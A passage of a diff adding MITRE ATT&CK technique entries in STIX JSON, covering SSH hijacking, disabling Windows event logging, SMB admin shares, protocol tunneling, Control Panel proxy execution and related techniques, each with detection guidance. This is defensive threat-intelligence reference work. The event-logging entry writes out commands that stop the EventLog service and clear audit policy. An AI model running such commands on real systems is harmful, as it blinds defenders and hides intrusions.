environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "root" + ], + "x_mitre_system_requirements": [ + "SSH service enabled, trust relationships configured, established connections" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", + "created": "2020-02-25T18:34:38.290Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1563/001", + "external_id": "T1563.001" + }, + { + "source_name": "Slideshare Abusing SSH", + "description": "Duarte, H., Morrison, B. (2012). (Mis)trusting and (ab)using ssh. Retrieved January 8, 2018.", + "url": "https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219" + }, + { + "source_name": "SSHjack Blackhat", + "description": "Adam Boileau. (2005, August 5). Trust Transience: Post Intrusion SSH Hijacking. Retrieved December 19, 2017.", + "url": "https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf" + }, + { + "source_name": "Clockwork SSH Agent Hijacking", + "description": "Beuchler, B. (2012, September 28). SSH Agent Hijacking. Retrieved December 20, 2017.", + "url": "https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking" + }, + { + "source_name": "Breach Post-mortem SSH Hijack", + "description": "Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved February 17, 2020.", + "url": "https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-18T22:33:57.556Z", + "name": "Disable Windows Event Logging", + "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped or sc config eventlog start=disabled commands (followed by manually stopping the service using Stop-Service -Name EventLog).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog then restarting the system for the change to take effect.(Citation: disable_win_evt_logging)\n\nThere are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the \"Start\" value in the key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System and HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application to disable the entire EventLog.(Citation: disable_win_evt_logging)\n\nAdditionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team", + "Lucas Heiligenstein" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering) \n\nIn Event Viewer, Event ID 1102 under the “Security” Windows Log and Event ID 104 under the “System” Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.\n\nMonitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Log analysis" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a", + "created": "2020-02-21T20:46:36.688Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562/002", + "external_id": "T1562.002" + }, + { + "source_name": "Disable_Win_Event_Logging", + "description": " dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.", + "url": "https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging" + }, + { + "source_name": "def_ev_win_event_logging", + "description": "Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.", + "url": "https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/" + }, + { + "source_name": "EventLog_Core_Technologies", + "description": "Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.", + "url": "https://www.coretechnologies.com/blog/windows-services/eventlog/" + }, + { + "source_name": "Audit_Policy_Microsoft", + "description": "Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy" + }, + { + "source_name": "Windows Log Events", + "description": "Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020.", + "url": "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/" + }, + { + "source_name": "disable_win_evt_logging", + "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.", + "url": "https://ptylu.github.io/content/report/report.html?report=25" + }, + { + "source_name": "auditpol", + "description": "Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol" + }, + { + "source_name": "winser19_file_overwrite_bug_twitter", + "description": "Naceri, A. (2021, November 7). Windows Server 2019 file overwrite bug. Retrieved April 7, 2022.", + "url": "https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040" + }, + { + "source_name": "T1562.002_redcanaryco", + "description": "redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.", + "url": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md" + }, + { + "source_name": "Advanced_sec_audit_policy_settings", + "description": "Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings" + }, + { + "source_name": "auditpol.exe_STRONTIC", + "description": "STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.", + "url": "https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html" + }, + { + "source_name": "evt_log_tampering", + "description": "svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.", + "url": "https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Scheduled Transfer", + "description": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\n\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", + "created": "2017-05-31T21:30:34.139Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1029", + "external_id": "T1029" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-07-28T17:34:51.250Z", + "name": "SMB/Windows Admin Shares", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\n\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\n\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "SMB enabled; Host/network firewalls not blocking SMB ports between source and destination; Use of domain account in administrator group on remote system or default system admin account." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", + "created": "2020-02-11T18:25:28.212Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1021/002", + "external_id": "T1021.002" + }, + { + "source_name": "Medium Detecting WMI Persistence", + "description": "French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96" + }, + { + "source_name": "TechNet RPC", + "description": "Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc787851.aspx" + }, + { + "source_name": "Microsoft Admin Shares", + "description": "Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.", + "url": "http://support.microsoft.com/kb/314984" + }, + { + "source_name": "Windows Event Forwarding Payne", + "description": "Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.", + "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem" + }, + { + "source_name": "Lateral Movement Payne", + "description": "Payne, J. (2015, November 26). Tracking Lateral Movement Part One - Special Groups and Specific Service Accounts. Retrieved February 1, 2016.", + "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts" + }, + { + "source_name": "Wikipedia Server Message Block", + "description": "Wikipedia. (2017, December 16). Server Message Block. Retrieved December 21, 2017.", + "url": "https://en.wikipedia.org/wiki/Server_Message_Block" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Implant Internal Image", + "description": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)\n\nA tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Yossi Weizman, Azure Defender Research Team", + "Vishwas Manral, McAfee", + "Praetorian" + ], + "x_mitre_detection": "Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.\n\nIn containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Containers" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f", + "created": "2019-09-04T12:04:03.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1525", + "external_id": "T1525" + }, + { + "source_name": "Rhino Labs Cloud Image Backdoor Technique Sept 2019", + "description": "Rhino Labs. (2019, August). Exploiting AWS ECR and ECS with the Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.", + "url": "https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/" + }, + { + "source_name": "Rhino Labs Cloud Backdoor September 2019", + "description": "Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.", + "url": "https://github.com/RhinoSecurityLabs/ccat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Protocol Tunneling", + "description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \n\nThere are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) \n\n[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. \n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", + "created": "2020-03-15T16:03:39.082Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1572", + "external_id": "T1572" + }, + { + "source_name": "SSH Tunneling", + "description": "SSH.COM. (n.d.). SSH tunnel. Retrieved March 15, 2020.", + "url": "https://www.ssh.com/ssh/tunneling" + }, + { + "source_name": "BleepingComp Godlua JUL19", + "description": "Gatlan, S. (2019, July 3). New Godlua Malware Evades Traffic Monitoring via DNS over HTTPS. Retrieved March 15, 2020.", + "url": "https://www.bleepingcomputer.com/news/security/new-godlua-malware-evades-traffic-monitoring-via-dns-over-https/" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Control Panel", + "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ESET" + ], + "x_mitre_detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the CPLs and Extended Properties Registry keys of HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).(Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application control" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", + "created": "2020-01-23T19:59:52.630Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/002", + "external_id": "T1218.002" + }, + { + "source_name": "Microsoft Implementing CPL", + "description": "M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018.", + "url": "https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx" + }, + { + "source_name": "TrendMicro CPL Malware Jan 2014", + "description": "Mercês, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + }, + { + "source_name": "TrendMicro CPL Malware Dec 2013", + "description": "Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/" + }, + { + "source_name": "Palo Alto Reaver Nov 2017", + "description": "Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" + }, + { + "source_name": "ESET InvisiMole June 2020", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Network Address Translation Traversal", + "description": "Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider monitoring network traffic on both interfaces of border network devices. Compare packets transmitted by the device between networks to look for signs of NAT being implemented. Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3. In some cases, Port Address Translation (PAT) may also be used by an adversary.\n\nMonitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "created": "2020-10-19T16:48:08.241Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1599/001", + 